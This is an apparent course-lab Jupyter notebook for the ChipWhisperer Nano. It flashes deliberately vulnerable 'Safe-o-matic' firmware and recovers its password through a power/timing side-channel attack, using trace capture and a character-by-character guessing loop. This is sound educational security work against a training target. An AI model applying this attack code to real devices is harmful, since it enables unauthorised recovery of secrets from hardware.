# Lab 5 Starter Notebook
Begin by importing the required libraries, connecting to the scope, and applying the default setup:

In [1]:
import chipwhisperer as cw
import matplotlib.pyplot as plt
import numpy as np
import scipy.stats

scope = cw.scope()
target = cw.target(scope, cw.targets.SimpleSerial) #cw.targets.SimpleSerial can be omitted
scope.default_setup()

print(scope)

See https://chipwhisperer.readthedocs.io/en/latest/api.html#firmware-update


Serial baud rate = 38400
ChipWhisperer Nano Device
fw_version = 
    major = 0
    minor = 24
    debug = 0
io = 
    tio1         = None
    tio2         = None
    tio3         = None
    tio4         = None
    pdid         = True
    pdic         = False
    nrst         = True
    clkout       = 7500000.0
    cdc_settings = None
adc = 
    clk_src  = int
    clk_freq = 7500000.0
    samples  = 5000
glitch = 
    repeat     = 0
    ext_offset = 0



Next, compile the firmware:

In [16]:
%%bash
cd ../../hardware/victims/firmware/simpleserial-base-lab5
make PLATFORM=CWNANO CRYPTO_TARGET=NONE

SS_VER set to SS_VER_1_1
rm -f -- training-CWNANO.hex
rm -f -- training-CWNANO.eep
rm -f -- training-CWNANO.cof
rm -f -- training-CWNANO.elf
rm -f -- training-CWNANO.map
rm -f -- training-CWNANO.sym
rm -f -- training-CWNANO.lss
rm -f -- objdir/*.o
rm -f -- objdir/*.lst
rm -f -- Lab-05-Training.s simpleserial.s stm32f0_hal_nano.s stm32f0_hal_lowlevel.s
rm -f -- Lab-05-Training.d simpleserial.d stm32f0_hal_nano.d stm32f0_hal_lowlevel.d
rm -f -- Lab-05-Training.i simpleserial.i stm32f0_hal_nano.i stm32f0_hal_lowlevel.i
.
Welcome to another exciting ChipWhisperer target build!!
arm-none-eabi-gcc (15:5.4.1+svn241155-1) 5.4.1 20160919
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

.
Compiling C: Lab-05-Training.c
arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS_VER=SS_VER_1_1 -DSTM32F030x

Lab-05-Training.c: In function 'password_checker_v2':
         if (real_password != test_password){
                           ^


Program the microcontroller with the hex file:

In [17]:
cw.program_target(scope, cw.programmers.STM32FProgrammer, "../../hardware/victims/firmware/simpleserial-base-lab5/Lab-05-Training.hex")

Serial baud rate = 115200
Detected known STMF32: STM32F04xxx
Extended erase (0x44), this can take ten seconds or more
Attempting to program 6875 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 6875 bytes
Serial baud rate = 38400


These functions allow you to reset the target from your code and read the start-up text from the device:

In [18]:
import time
def reset_target(): 
    scope.io.nrst = 'low'
    time.sleep(0.05)
    scope.io.nrst = 'high'
    time.sleep(0.05)

def readall_target():
    ret = ""
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(timeout=10)
        time.sleep(0.1)
        num_char = target.in_waiting()
    return ret

Call those two functions here (print the output of readall_target())

In [19]:
reset_target()
print(readall_target())

*****Safe-o-matic 3000 Booting...
Aligning bits........[DONE]
Checking Cesium RNG..[DONE]
Masquerading flash...[DONE]
Decrypting database..[DONE]


PleasDecrypting database..[DONE]


Please enter password to continue: 


Here is an example of resetting the target, writing a password to the device, and reading back the result:

In [20]:
#reset_target()
ret = ""
reset_target()
num_char = target.in_waiting()
while num_char > 0:
    ret += target.read(timeout=10)
    time.sleep(0.01)
    num_char = target.in_waiting()

target.flush()

passwd = "USFCSE"

# encode password as bytes
# then append 0s at the end because it expects 16 bytes
b = bytearray(passwd.encode())
b += bytes(16 - len(b))

target.simpleserial_write('b', b)
time.sleep(0.01)
target.simpleserial_read('r', 16).decode()[:-2]

'ACCESS GRANTED'

## Recording Traces

Now that we can communicate with our super-secure system, our next goal is to get a power trace while the target is running. To do this, we'll arm the scope just before we send our password attempt, then record the trace as we've done before.

In [21]:
scope.adc.samples = 800

## Timing Analysis

In [22]:
ret = ""
reset_target()
num_char = target.in_waiting()
while num_char > 0:
    ret += target.read(timeout=10)
    time.sleep(0.01)
    num_char = target.in_waiting()
    
scope.arm()
target.flush()
passwd = "USFCSE"

b = bytearray(passwd.encode())
b += bytes(16 - len(b))
target.simpleserial_write('a', b)
ret = scope.capture()
if ret:
    print('Timeout happened during acquisition')
        
trace = scope.get_last_trace()
resp = ""
num_char = target.in_waiting()
while num_char > 0:
    resp += target.read(timeout=10)
    time.sleep(0.01)
    num_char = target.in_waiting()


Now that we have a trace, we'll plot it:

In [23]:
%matplotlib notebook
import matplotlib.pylab as plt

plt.plot(trace)

<IPython.core.display.Javascript object>

[<matplotlib.lines.Line2D at 0x7fc2b014f590>]

Now that we can capture traces, we can begin planning our attack. First we'll make a function to guess a password and return a power trace, since we'll be repeating those steps a lot:

In [24]:
def cap_pass_trace(pass_guess):
    ret = ""
    reset_target()
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()

    scope.arm()
    b = bytearray(pass_guess.encode())
    b += bytes(16 - len(b))
    target.simpleserial_write('a', b)
    
    # Use the below code to make password not breakable by SCA attack
    #target.simpleserial_write('b', b)
    
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    return trace

In [25]:
%matplotlib notebook
import matplotlib.pylab as plt

trace_correct = cap_pass_trace("USFCSE")
trace_wrong0  = cap_pass_trace("123456")
trace_wrong1  = cap_pass_trace("U12345")
trace_wrong2  = cap_pass_trace("US2565")
trace_wrong3  = cap_pass_trace("USF123")
trace_wrong4  = cap_pass_trace("USFC12")
trace_wrong5  = cap_pass_trace("USFCS1")

plot1 = plt.figure(1)
plt.title("0 correct letters")
plt.plot(trace_wrong0[0:100], 'r')
plt.plot(trace_correct[0:100], 'k')

plot1 = plt.figure(2)
plt.title("1 correct letter")
plt.plot(trace_wrong1[0:100], 'r')
plt.plot(trace_correct[0:100], 'k')

plot1 = plt.figure(3)
plt.title("2 correct letters")
plt.plot(trace_wrong2[0:100], 'r')
plt.plot(trace_correct[0:100], 'k')

plot1 = plt.figure(4)
plt.title("3 correct letters")
plt.plot(trace_wrong3[0:100], 'r')
plt.plot(trace_correct[0:100], 'k')

plot1 = plt.figure(5)
plt.title("4 correct letters")
plt.plot(trace_wrong4[0:100], 'r')
plt.plot(trace_correct[0:100], 'k')

plot1 = plt.figure(6)
plt.title("5 correct letters")
plt.plot(trace_wrong5[0:100], 'r')
plt.plot(trace_correct[0:100], 'k')


<IPython.core.display.Javascript object>

<IPython.core.display.Javascript object>

<IPython.core.display.Javascript object>

<IPython.core.display.Javascript object>

<IPython.core.display.Javascript object>

<IPython.core.display.Javascript object>

[<matplotlib.lines.Line2D at 0x7fc2abf28b10>]

## Attacking a Single Letter

Now that we've located a distinctive timing difference, we can start building our attack. We'll start with a single letter, since that will quickly give us some feedback on the attack.

The plan for the attack is simple: keep guessing letters until we no longer see the distinctive spike in the original location. To do this, we'll create a loop that:

* Figures out our next guess
* Does the capture and records the trace
* Checks if sample 229 is larger than -0.2 (replace with appropriate values)

To make things a little easier for later, we'll make a function that will return whether our spike is (guess incorrect) or isn't (guess correct) in the right location:

In [27]:
import string

letters = list(string.ascii_lowercase + string.ascii_uppercase)
#print(letters)

pswd = ""
index = 30

for i in range(6):
    print(index)
    # this is a hardcoded fix and i dont think it will hold up in extended testing
    if index == 90:
        index = index + 1
        
    for letter in letters:
        # convert guess to bits and send to passwords checker v2
        # capture and return trace
        guess = pswd + letter
        curr_trace  = cap_pass_trace(guess)
            
        # find which trace is not like the others
        if curr_trace[index] < -0.2:
            print('LETTER GUESS : ' + letter)
            pswd += letter
            index = index + 12
            break
            
        if letter == 'Z':
                index = index +1

print(pswd)   

30
31


KeyboardInterrupt: 

## Attacking the Full Password

Now that we can guess a single character, attacking the rest is easy; we just need to repeat the process in another loop, move the check point (this is the change is location you recorded earlier), and update our guess with the new correct letter.

After updating the below script and running it, you should see parts of the password printed out as each letter is found.

In [None]:
cw.program_target(scope, cw.programmers.STM32FProgrammer, "../../hardware/victims/firmware/simpleserial-base-lab5/Lab-05-Attack.hex")

In [None]:
import string

def FindPassword():
    letters = list(string.ascii_lowercase + string.ascii_uppercase)
    #print(letters)

    pswd = ""
    index = 30

    for i in range(16):
        #print(index)
    
        for letter in letters:
            # convert guess to bits and send to passwords checker v2
            # capture and return trace
            guess = pswd + letter
            curr_trace = cap_pass_trace(guess)
    
            # find which trace is not like the others
            if curr_trace[index] < -0.2:
                pswd += letter
                index = index + 12
                print('PASSWORD GUESS : ' + pswd)
            
                # Test to see if current password is correct
                b = bytearray(pswd.encode())
                b += bytes(16 - len(b))
                target.simpleserial_write('a', b)
                time.sleep(0.01)
                test = target.simpleserial_read('r', 16).decode()[:-2]
    
                if test == 'ACCESS GRANTED':
                    print('\n The Correct Password is : ' + pswd)
                    return
                else:
                    print(test)
                break
                
            if letter == 'Z':
                index = index +1
                
f = FindPassword()

In [None]:
# Test to see if current password is correct
pswd = 'TimingSCAftw'
b = bytearray(pswd.encode())
b += bytes(16 - len(b))
target.simpleserial_write('a', b)
time.sleep(0.01)
test = target.simpleserial_read('r', 16).decode()[:-2]
if test == 'ACCESS GRANTED':
    print('THE CORRECT PASSWORD IS ' + pswd)